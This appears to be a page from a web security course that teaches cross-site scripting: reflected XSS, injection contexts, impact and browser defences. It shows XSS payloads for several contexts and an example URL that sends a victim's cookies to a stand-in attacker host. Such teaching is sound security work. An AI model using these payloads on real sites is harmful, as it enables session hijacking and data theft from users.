XSS Fundamentals

Understanding the core concepts and types of Cross-Site Scripting attacks

Cross-Site Scripting (XSS) attacks are a type of injection vulnerability where malicious scripts are injected into trusted websites. Understanding the fundamental concepts of XSS is essential for both identifying vulnerabilities and implementing effective defenses.

Types of XSS Attacks

Reflected XSS

Reflected XSS occurs when malicious script is reflected off a web server, such as in search results, error messages, or any other response that includes some or all of the input sent to the server as part of the request. Reflected XSS is non-persistent and typically requires a victim to click on a specially crafted link.

Example Attack Flow:

  1. Attacker creates a malicious URL with embedded JavaScript
  2. Victim clicks on the link (often via phishing)
  3. The server reflects the script in its response
  4. The victim's browser executes the script
https://vulnerable-site.com/search?query=\<script\>fetch('https://attacker.com/steal?cookie='+document.cookie)\</script\>

Key Distinction:

The main difference between the three types of XSS is where the payload is stored and how it's delivered to the victim. Reflected XSS requires user interaction with a malicious link, stored XSS affects anyone who views the compromised page, and DOM-based XSS executes through client-side JavaScript manipulation.

XSS Attack Vectors

XSS attacks can be delivered through various vectors:

  • HTML Context: Injecting script tags or event handlers

    <script>alert('XSS')</script>
\<body onload="alert('XSS')"\>

  • JavaScript Context: Breaking out of existing JavaScript

    ';alert('XSS');//

  • Attribute Context: Escaping from HTML attributes

    " onmouseover="alert('XSS')"

  • URL Context: Exploiting javascript: protocol

    \<a href="javascript:alert('XSS')"\>Click me\</a\>

  • CSS Context: Exploiting expression() in older IE browsers

    \<style\>body {background-image:url("javascript:alert('XSS')")\}\</style\>

Execution Contexts

Understanding the context in which your payload will be executed is crucial for crafting effective XSS attacks:

HTML Context

When user input is inserted directly into the HTML body, attackers can inject complete HTML tags including script tags, event handlers, or iframe elements.

Example:

<div>User input: [INJECTION POINT]</div>

Payload:

<script>alert(document.cookie)</script>

HTML Attribute Context

When user input is placed within HTML attributes, attackers need to escape the attribute before injecting malicious code.

Example:

\<input type="text" value={"[INJECTION POINT]"}\>

Payload:

" onmouseover="alert(document.cookie)" x="

JavaScript Context

When user input is embedded within JavaScript code, attackers need to terminate existing JavaScript statements before injecting their own code.

Example:

<script>
  var username = '[INJECTION POINT]';
  document.write('Welcome, ' + username);
</script>

Payload:

';alert(document.cookie);//

URL Context

When user input is placed in URL parameters or as part of a URL, attackers can use the javascript: protocol.

Example:

\<a href="[INJECTION POINT]"\>Click here\</a\>

Payload:

javascript:alert(document.cookie)

Impact of XSS Vulnerabilities

XSS vulnerabilities can lead to several serious security issues:

  • Session Hijacking: Stealing user cookies to impersonate them
  • Credential Theft: Capturing login credentials via fake forms
  • Data Exfiltration: Stealing sensitive information from the page
  • Site Defacement: Modifying the appearance of the website
  • Malware Distribution: Redirecting users to malicious downloads
  • Network Scanning: Using the victim's browser to scan internal networks
  • Crypto Mining: Running cryptocurrency miners in the victim's browser

Same-Origin Policy:

XSS attacks are particularly dangerous because they bypass the Same-Origin Policy (SOP). Since the malicious script executes in the context of the vulnerable website, it has access to that site's cookies, session tokens, and other sensitive information.

Browser Security Mechanisms

Modern browsers implement several security mechanisms to mitigate XSS attacks:

  • Content Security Policy (CSP): Restricts which scripts can execute
  • HttpOnly Cookies: Prevents JavaScript from accessing cookies
  • X-XSS-Protection: Built-in XSS filtering (deprecated in modern browsers)
  • Iframe Sandboxing: Restricts iframe capabilities
  • Subresource Integrity: Ensures resources haven't been tampered with

Understanding these protections and how they can be bypassed is essential for comprehensive XSS testing.

In the next section, we'll explore techniques for identifying XSS vulnerabilities in web applications.